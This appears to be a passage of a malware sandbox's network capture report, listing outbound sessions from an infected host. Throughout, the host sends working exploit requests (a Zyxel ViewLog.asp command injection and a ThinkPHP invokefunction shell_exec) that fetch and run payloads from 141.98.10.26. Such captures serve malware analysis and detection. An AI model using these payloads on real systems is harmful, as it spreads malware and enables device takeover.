Nov 22, 2023 08:38:25.807073116 CET	4295	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:34.765645981 CET	5438	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.195063114 CET	7670	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:30.057852983 CET	12160	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.23	47352	95.163.229.155	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.336517096 CET	3374	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.23	52252	95.85.216.162	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.381042004 CET	3386	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:17.609508038 CET	3395	IN	HTTP/1.1 501 Not Implemented Connection: Keep-Alive Content-Length: 121 Date: Wed, 22 Nov 2023 07:38:17 GMT Expires: 0 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.23	59134	95.100.115.15	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.557693005 CET	3392	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:17.760225058 CET	3400	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:17 GMT Date: Wed, 22 Nov 2023 07:38:17 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 66 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 36 39 37 26 23 34 36 3b 39 33 38 64 33 63 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.2f8e2117.1700638697.938d3c5</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.23	51582	95.183.36.137	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.584779978 CET	3394	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:17.814441919 CET	3402	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Wed, 22 Nov 2023 07:38:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.23	47452	31.136.154.38	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.650749922 CET	3397	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:18.224003077 CET	3417	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:19.343817949 CET	3531	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:21.711497068 CET	3823	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:26.318835020 CET	4440	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:35.277561903 CET	5468	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.195056915 CET	7670	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:30.057868958 CET	12161	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.23	34700	31.136.175.14	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.651590109 CET	3397	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:18.224001884 CET	3417	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:19.343821049 CET	3531	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:21.711493015 CET	3822	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:26.318834066 CET	4440	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:35.277574062 CET	5468	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.195055008 CET	7669	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:30.057862997 CET	12161	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.23	59204	94.120.12.6	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.772146940 CET	3401	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.23	50898	94.122.225.115	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.776520014 CET	3401	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.23	53734	112.125.218.14	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:18.062882900 CET	3406	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:18.374802113 CET	3428	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:33:12 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.23	58740	112.74.49.41	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:18.074774027 CET	3407	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:19.060597897 CET	3517	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:19.392653942 CET	3532	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:19 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.23	47998	95.179.146.105	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:19.586883068 CET	3566	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
